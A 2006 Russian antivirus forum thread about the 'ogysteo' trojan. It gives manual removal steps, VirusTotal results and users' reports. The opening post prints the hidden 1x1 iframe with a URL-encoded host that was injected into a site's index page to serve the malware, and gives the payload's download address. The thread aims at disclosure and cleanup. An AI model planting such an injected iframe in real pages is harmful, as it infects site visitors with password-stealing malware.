Trojan-Dropper.Win32.Agent.ays - ogysteo

**tjroot** · 25.11.2006, 01:46

Посвящается модераторам, администраторам сайтов, серверов….

Дело было так, пришел я, значит, сегодня домой и решил посмотреть на статистику и
Страницы сайтов, которые поддерживает наша группа разработчиков (CSD group – http://www.csd.programming-security.ru) и на одном из сайтов во время загрузки перед открытием страницы зафиксировал подгрузку интересного фрейма (сайт про который идет речь – http://tvh-aliance.ru , - код уже исправлен) с забугорного сайта, Каспер – надо отдать ему должное сразу же начал материться, и распознал в открываемом фрейме- не ладное, а именно вирусное ПО (благодарности Крису). После этого инцидента проверил исходные коды страниц, скриптов, что оказалось (внимание админов и модераторов!) на заглавной странице- index.php сразу же после тега <html> перед тегом <head> имелся интересный HTML код вида:
<iframe src="http://%61%6c%65%72%74%2d%63%61.%63%6f%6d/%63%6f%75%6e%74%65%72%31/%69%6e%64%65%78.%70%68%70" width=1 height=1></iframe>
Этот милый фрейм загружал на компьютер посетителей сайта следующий файл:
http://53server.com/counter1/load.xxx - как видите адрес указан в строке….

(Админы и модераторы, проверьте, пожалуйста, все заглавные страницы на своих серверах, дабы не дать трояну распространяться по Всей сети….!)

А далее я отрубил Каспера (чтобы не мешал) загрузил вирус на компьютер и начал изучать…. Оказалось что он скрывается используя функции режима ядра, прописывает себя в реестре откуда и грузится на компьютер добропорядочный пользователей, подворовывает пароли… Дальше исследовать я его не стал… Нету времени, а удалить можно так:

Сначала в реестре в разделе HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
ищем ключ port windows, удаляем его вместе с содержимым 

после этого перезагружаемся (в обычном режиме)
Троян уже не загружен! Открываем %SystemDir% находим файло ogysteo.exe
И удаляем его руками…. Учтите куски кода останутся на машине в виде драйвера режима ядра и вирусной dll, но они будут бесполезны, я этого не стал изучать, нет времени. Если у кого будет время его поизучать вышлите пожалуйста наработки, вплоть до сырых дезассемблировок. Можем вместе повеселиться над телом несчастного вируса…..

P.S. Каспер его классифицирует как Trojan-Dropper.Win32.Agent.ays,
если выше перечисленные манипуляции не помогли и Троянов много, значит у Вас сидит Trojan.Downloader, который качает к Вам всякую нечисть в том числе и разобранный нами Троянский вирус, для излечения нужны более экзотические меры как то составление отчета о системе и отсылка его мне, вместе проанализируем, скажу что удалить, может Вы мне вышлите найденные образцы – я их обычно изучаю и пишу противоядие….

Скоро выйдет утилита для излечения от ogysteo…

Да чуть не забыл, а постоянно грузится он к Вам, даже после удаления, потому что оставляет свой "дистрибутив" в папке Temp для Вашей учетной записи пользователя, на этот дистрибутив как раз и указывает выше названный ключ в реестре.......
Напишите в форум или вышлите на мыло название вирусного ключа в Вашем реестре, даже если ключ отличается от того что я указал Выше -
port windows, то просто откройте раздел реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
- это автоматически запускаемые программы, и внимательно взгляните на ключи со значениями подобными этому:
C:\Documents and Settings\%Название Вашей учетной записи%\Local Settings\Temp\%название вирусного "дистрибутива" - ключей загружаемых данные из папки Documents and Settings, не бывает априоре, если он есть то скорее всего его оставил для себя Троян, тем более из временной папки Temp....
Жду Ваших ответов...
С уважением к обитателям форума Сергей aka tjroot [email protected]

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

fdhert · 26.11.2006, 02:32

У меня лицензионный Доктор Веб, сегодняшнего обновления, так он не ловит этот вирус ни хрена!!! Позор!!!

Избавился я сегодня от вируса примерно таким же способом.
Только вместо лазанья по реестру использую RegCleaner.

Сначала нажать Ctrl-Alt-Del, убить процесс ogysteo.
Затем удалить все содержимое папки ...\TEMP. Некоторые файлы не захотят удаляться, убить соответствующие процессы, и все равно удалить все содержимое этой папки.
Затем удалить сам ogysteo, у меня он был в Windows\System32.
Перезагрузиться, запустить RegCleaner, снести все лишнее из автозагрузки.

Перезагрузиться. Запустить RegCleaner.
Если в автозагрузке осталась лажа, обычно - пустая строка без названия программы, иногда - бред кириллицей или английские слова, повторять в разных вариациях указанные действия до тех пор, пока лажа не исчезнет и не перестанет там появляться. У меня это заняло 3 - 4 попытки.

Игор Данилов! Срочно делайте обновление!
У кого этот вирус остался - пришлите его авторам DrWeb, я свои стер.

**tjroot** · 26.11.2006, 13:12

Наверное у тебя была другая версия данного вируса, потому что то что у меня сидело, оно скрывало свой процесс с помощью перехвата функции ZwQyerySystemInformation (я свою копию все таки изучил...), помимо всего прочего он скрывал и свои файлы, поэтому я начал с реестра, к сожалению сейчас в сети много однотипных троянов которые прячут свои процессы и файлы по сходному механизму, а вот создателям вредоносного кода не под силу спрятать свои творения и в реестре, это связано с тем что в сети 4-5 месяцев назад появились интересные мануалы и исходники по сокрытию процессов, файлов и т.д. Накачали к себе данные исходники всякие ламаки и веселятся....
Поэтому так много сходных троянов отлавливается. А вообще программистов призываю не кидаться опасными знаниями. Вирусописатели - написание антивирусного ПО - это более благородное дело, если даже учесть всю сложность устройства антивирусного ПО.

С уважением Сергей [email protected]

Phiolo · 27.11.2006, 17:50

Спасибо, вируса больше нет! У меня тоже был ключ port windows.

**tjroot** · 27.11.2006, 18:54

Единственное чего прошу шлите мне новые вирусы.... Которые обнаружили...... [email protected]

чайник · 28.11.2006, 01:33

Удалил вручную из System32 и ссылки RegCleaner'om. Прошелся по регистру и вручную удалил все параметры со словосочетанием ogysteo.exе (таких оказалось в разных местах целых 3)

Нортон со самыми свежими обновлениями (22 ноября) пролопушился. Зато исходящие попытки этого трояна засек Аутпост Файрволл, спасибо ему за это. При загрузке системы с трояном она вываливалась в синий экран, ковырялся тоже в Safe Mode

PS В темпе учетной записи архива не обнаружил!

**tjroot** · 28.11.2006, 18:07

http://virusinfo.info/showthread.php?t=6940 в данном разделе форума я описал что делать с подгрузкой фреймов, даже если вы удалили вирус!

**Sanja** · 29.11.2006, 00:15

STATUS: FINISHEDComplete scanning result of "ogysteo.exe", received in VirusTotal at 11.28.2006, 22:00:01 (CET).

Antivirus Version Update Result
AntiVir 7.2.0.46 11.28.2006 TR/Proxy.Small.DU.16
Authentium 4.93.8 11.27.2006 could be infected with an unknown virus
Avast 4.7.892.0 11.28.2006 no virus found
AVG 386 11.28.2006 Generic2.KKL
BitDefender 7.2 11.28.2006 no virus found
CAT-QuickHeal 8.00 11.28.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 11.28.2006 no virus found
DrWeb 4.33 11.28.2006 Trojan.Spambot
eSafe 7.0.14.0 11.28.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.69 11.28.2006 no virus found
eTrust-Vet 30.3.3219 11.28.2006 no virus found
Ewido 4.0 11.28.2006 no virus found
Fortinet 2.82.0.0 11.28.2006 suspicious
F-Prot 3.16f 11.27.2006 could be infected with an unknown virus
F-Prot4 4.2.1.29 11.27.2006 generic
Ikarus 0.2.65.0 11.28.2006 no virus found
Kaspersky 4.0.2.24 11.28.2006 Trojan-Proxy.Win32.Small.du
McAfee 4906 11.28.2006 no virus found
Microsoft 1.1804 11.28.2006 no virus found
NOD32v2 1887 11.28.2006 probably unknown NewHeur_PE virus
Norman 5.80.02 11.28.2006 no virus found
Panda 9.0.0.4 11.28.2006 Suspicious file
Prevx1 V2 11.28.2006 no virus found
Sophos 4.11.0 11.16.2006 no virus found
TheHacker 6.0.3.124 11.27.2006 no virus found
UNA 1.83 11.28.2006 no virus found
VBA32 3.11.1 11.28.2006 no virus found
VirusBuster 4.3.15:9 11.28.2006 no virus found

STATUS: FINISHEDComplete scanning result of "avz00003.dta", received in VirusTotal at 11.28.2006, 22:00:31 (CET).

Antivirus Version Update Result
AntiVir 7.2.0.46 11.28.2006 no virus found
Authentium 4.93.8 11.27.2006 no virus found
Avast 4.7.892.0 11.28.2006 no virus found
AVG 386 11.28.2006 no virus found
BitDefender 7.2 11.28.2006 no virus found
CAT-QuickHeal 8.00 11.28.2006 no virus found
ClamAV devel-20060426 11.28.2006 no virus found
DrWeb 4.33 11.28.2006 no virus found
eSafe 7.0.14.0 11.28.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.69 11.28.2006 no virus found
eTrust-Vet 30.3.3219 11.28.2006 no virus found
Ewido 4.0 11.28.2006 no virus found
Fortinet 2.82.0.0 11.28.2006 suspicious
F-Prot 3.16f 11.27.2006 no virus found
F-Prot4 4.2.1.29 11.27.2006 no virus found
Ikarus 0.2.65.0 11.28.2006 no virus found
Kaspersky 4.0.2.24 11.28.2006 SpamTool.Win32.Agent.t
McAfee 4906 11.28.2006 no virus found
Microsoft 1.1804 11.28.2006 no virus found
NOD32v2 1887 11.28.2006 no virus found
Norman 5.80.02 11.28.2006 no virus found
Panda 9.0.0.4 11.28.2006 Suspicious file
Prevx1 V2 11.28.2006 no virus found
Sophos 4.11.0 11.16.2006 no virus found
TheHacker 6.0.3.124 11.27.2006 no virus found
UNA 1.83 11.28.2006 no virus found
VBA32 3.11.1 11.28.2006 suspected of Email-Worm.Mydoom.3 (paranoid heuristics)
VirusBuster 4.3.15:9 11.28.2006 no virus found

STATUS: FINISHEDComplete scanning result of "avz00002.dta", received in VirusTotal at 11.28.2006, 22:01:31 (CET).

Antivirus Version Update Result
AntiVir 7.2.0.46 11.28.2006 no virus found
Authentium 4.93.8 11.27.2006 no virus found
Avast 4.7.892.0 11.28.2006 Win32:Trojano-CS
AVG 386 11.28.2006 no virus found
BitDefender 7.2 11.28.2006 no virus found
CAT-QuickHeal 8.00 11.28.2006 no virus found
ClamAV devel-20060426 11.28.2006 no virus found
DrWeb 4.33 11.28.2006 no virus found
eSafe 7.0.14.0 11.28.2006 no virus found
eTrust-InoculateIT 23.73.69 11.28.2006 no virus found
eTrust-Vet 30.3.3219 11.28.2006 no virus found
Ewido 4.0 11.28.2006 no virus found
Fortinet 2.82.0.0 11.28.2006 no virus found
F-Prot 3.16f 11.27.2006 no virus found
F-Prot4 4.2.1.29 11.27.2006 no virus found
Ikarus 0.2.65.0 11.28.2006 no virus found
Kaspersky 4.0.2.24 11.28.2006 SpamTool.Win32.Agent.t
McAfee 4906 11.28.2006 no virus found
Microsoft 1.1804 11.28.2006 no virus found
NOD32v2 1887 11.28.2006 no virus found
Norman 5.80.02 11.28.2006 no virus found
Panda 9.0.0.4 11.28.2006 Suspicious file
Prevx1 V2 11.28.2006 no virus found
Sophos 4.11.0 11.16.2006 no virus found
TheHacker 6.0.3.124 11.27.2006 no virus found
UNA 1.83 11.28.2006 SpamTool.Win32.Agent.F918
VBA32 3.11.1 11.28.2006 suspected of Email-Worm.Mydoom.3 (paranoid heuristics)
VirusBuster 4.3.15:9 11.28.2006 no virus found

**ZAG** · 29.11.2006, 09:58

словил такое load.xxx на днях. NOD32 матерился на то, что файл пытается загрузиться, но было непонятно, ставил он перед фактом, что это уже произошло или тока предупреждал, но блокировал загрузку...

вчера стал перезагружаться комп.
windows port из реестра снес, но удалить, как я понимаю его приложение не удается. После рестарта в реестре автозапуска программ опять всплывает некий e349349.exe или что-то типа того, запускаемый из локальной директории пользователя.
Снос темпов IE не помог.
netstat -a -b показывает открытые сессии к почтовым сервисам hotmail, google, etc.
Видимо, не до конца гадость убил

**pig** · 29.11.2006, 11:58

Тогда выполните правила.

Trojan-Dropper.Win32.Agent.ays - ogysteo

Опции темы

Trojan-Dropper.Win32.Agent.ays - ogysteo

Спасибо!

Вам спасибо за благодарности....

Похожие темы

троянская программа Trojan.Win32.Delf.nia, Trojan-Dropper.Win32.Agent.atvx, Trojan.Win32.Koblu.lh

Trojan-Dropper.Win32.Agent.clv и ко

Trojan-Dropper.Win32.Agent.son

Trojan-Dropper.Win32.Agent.cyl

Trojan-Dropper.Win32.Agent.dxa в ESS+rus

Ваши права в разделе